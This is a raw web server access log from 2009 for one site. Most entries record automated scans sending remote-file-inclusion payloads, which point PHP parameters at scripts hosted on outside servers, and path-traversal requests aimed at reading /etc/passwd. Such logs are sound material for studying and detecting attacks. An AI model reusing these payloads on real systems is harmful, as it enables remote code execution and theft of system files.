202.123.212.188 - - [31/Oct/2009:22:20:09 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [31/Oct/2009:22:20:09 -0700] "GET /logs/access_090329.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [31/Oct/2009:22:20:09 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [31/Oct/2009:22:23:49 -0700] "GET /index1.php?=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [31/Oct/2009:22:23:49 -0700] "GET /logs/index1.php?=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [31/Oct/2009:22:23:49 -0700] "GET /logs/access_090329.log%20%20/index1.php?=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
221.143.29.189 - - [31/Oct/2009:22:25:59 -0700] "GET /dm-albums/template/album.php?SECURITY_FILE=http://www.thaiantitobacco.com/lamb//copyright?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
174.129.166.241 - - [31/Oct/2009:22:29:42 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090926 Iceweasel/3.5.3 (Debian-3.5.3-1)" "www.budapestcapital.com"
174.129.166.241 - - [31/Oct/2009:22:29:42 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090926 Iceweasel/3.5.3 (Debian-3.5.3-1)" "www.budapestcapital.com"
174.129.166.241 - - [31/Oct/2009:22:29:42 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090926 Iceweasel/3.5.3 (Debian-3.5.3-1)" "www.budapestcapital.com"
174.129.166.241 - - [31/Oct/2009:22:29:42 -0700] "GET /?D=A HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090926 Iceweasel/3.5.3 (Debian-3.5.3-1)" "www.budapestcapital.com"
174.129.166.241 - - [31/Oct/2009:22:29:43 -0700] "GET /?M=A HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090926 Iceweasel/3.5.3 (Debian-3.5.3-1)" "www.budapestcapital.com"
174.129.166.241 - - [31/Oct/2009:22:29:43 -0700] "GET /?N=D HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090926 Iceweasel/3.5.3 (Debian-3.5.3-1)" "www.budapestcapital.com"
174.129.166.241 - - [31/Oct/2009:22:29:43 -0700] "GET /?S=A HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090926 Iceweasel/3.5.3 (Debian-3.5.3-1)" "www.budapestcapital.com"
174.129.166.241 - - [31/Oct/2009:22:29:43 -0700] "GET /_private/ HTTP/1.1" 403 163 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090926 Iceweasel/3.5.3 (Debian-3.5.3-1)" "www.budapestcapital.com"
174.129.166.241 - - [31/Oct/2009:22:29:43 -0700] "GET /logs/ HTTP/1.1" 200 3369 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090926 Iceweasel/3.5.3 (Debian-3.5.3-1)" "www.budapestcapital.com"
174.129.166.241 - - [31/Oct/2009:22:29:43 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090926 Iceweasel/3.5.3 (Debian-3.5.3-1)" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:22:34:55 -0700] "GET //vwar/backup/errors.php?error=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:22:34:55 -0700] "GET /logs/access_090329.log%20%20///vwar/backup/errors.php?error=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:22:34:55 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.236.47.182 - - [31/Oct/2009:22:37:34 -0700] "GET /logs/access_090401.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.236.47.182 - - [31/Oct/2009:22:39:32 -0700] "GET /logs/access_090329.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:44:49 -0700] "GET /mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:44:52 -0700] "GET /mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:44:52 -0700] "GET /logs//mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:44:52 -0700] "GET /logs/access_090331.log%20%20//mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:44:53 -0700] "GET /logs/access_090331.log%20%20//mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:44:53 -0700] "GET /logs//mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:45:09 -0700] "GET /mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:45:09 -0700] "GET /logs//mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:45:13 -0700] "GET /logs/access_090331.log%20%20//mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
69.64.94.64 - - [31/Oct/2009:22:47:18 -0700] "GET /logs/access.log//dm-albums/template/album.php?SECURITY_FILE=http://www.thaiantitobacco.com/lamb//copyright?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
69.64.94.64 - - [31/Oct/2009:22:47:19 -0700] "GET /dm-albums/template/album.php?SECURITY_FILE=http://www.thaiantitobacco.com/lamb//copyright?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
69.64.94.64 - - [31/Oct/2009:22:47:19 -0700] "GET /logs//dm-albums/template/album.php?SECURITY_FILE=http://www.thaiantitobacco.com/lamb//copyright?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:22:49:05 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:22:49:05 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:22:49:05 -0700] "GET /logs/access_090401.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:22:49:05 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:22:49:06 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:22:49:11 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:22:49:11 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:22:49:11 -0700] "GET /logs/access_090401.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:22:49:22 -0700] "GET /logs/access_090401.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:22:49:22 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:22:49:24 -0700] "GET /logs/access_090401.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:22:49:24 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:51:01 -0700] "GET /logs/access_090331.log//mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:51:02 -0700] "GET /logs/access_090331.log//mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:51:03 -0700] "GET /logs/access_090331.log//mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:51:36 -0700] "GET /logs/access_090329.log//mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:51:45 -0700] "GET /logs/access_090329.log//mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:22:51:53 -0700] "GET /logs/access_090329.log//mcf.php?content=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
188.60.75.79 - - [31/Oct/2009:23:02:33 -0700] "GET /logs/access_090329.log/index.php?meio=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.budapestcapital.com"
188.60.75.79 - - [31/Oct/2009:23:02:33 -0700] "GET /logs/access_090401.log/index.php?meio=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.budapestcapital.com"
188.60.75.79 - - [31/Oct/2009:23:02:33 -0700] "GET /index.php?meio=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.budapestcapital.com"
188.60.75.79 - - [31/Oct/2009:23:02:33 -0700] "GET /logs/index.php?meio=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.budapestcapital.com"
77.88.29.248 - - [31/Oct/2009:23:08:21 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:12:56 -0700] "GET /index.php?e=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:12:56 -0700] "GET /logs/access_090331.log%20/index.php?e=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:12:56 -0700] "GET /logs/index.php?e=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:12:56 -0700] "GET /index.php?e=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:12:56 -0700] "GET /logs/index.php?e=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:12:56 -0700] "GET /logs/access_090331.log%20/index.php?e=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
121.136.177.137 - - [31/Oct/2009:23:15:12 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [31/Oct/2009:23:15:12 -0700] "GET /logs/access_090329.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [31/Oct/2009:23:15:12 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:18:23 -0700] "GET /index.php?x=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:18:23 -0700] "GET /index.php?x=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:23:21:35 -0700] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:23:21:35 -0700] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:23:21:35 -0700] "GET /logs/access.log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:23:22:05 -0700] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:23:22:05 -0700] "GET /logs/access.log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:23:22:05 -0700] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:23:22:50 -0700] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:23:22:59 -0700] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:23:23:12 -0700] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:23:23:12 -0700] "GET /logs/access.log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:23:23:23 -0700] "GET /logs/access.log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:23:23:23 -0700] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [31/Oct/2009:23:30:43 -0700] "GET /logs/access_090329.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /logs/access_090501.log%20%20/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /logs/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /logs/access_090501.log%20%20/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /logs/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /logs/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /logs/access_090501.log%20%20/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /logs/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /logs/access_090501.log%20%20/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /logs/access_090501.log%20%20/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /logs/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:17 -0700] "GET /solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:18 -0700] "GET /solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:18 -0700] "GET /logs/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:32:18 -0700] "GET /logs/access_090501.log%20%20/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:32:20 -0700] "GET /index.php?ex=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:32:20 -0700] "GET /index.php?ex=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:32:36 -0700] "GET /index.php?x=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:32:36 -0700] "GET /index.php?x=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:33:57 -0700] "GET /logs/access_090331.log%20%20/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:33:57 -0700] "GET /logs/access_090331.log%20%20/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:33:57 -0700] "GET /logs/access_090331.log%20%20/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:33:58 -0700] "GET /logs/access_090331.log%20%20/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:23:34:04 -0700] "GET /logs/access_090331.log%20%20/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
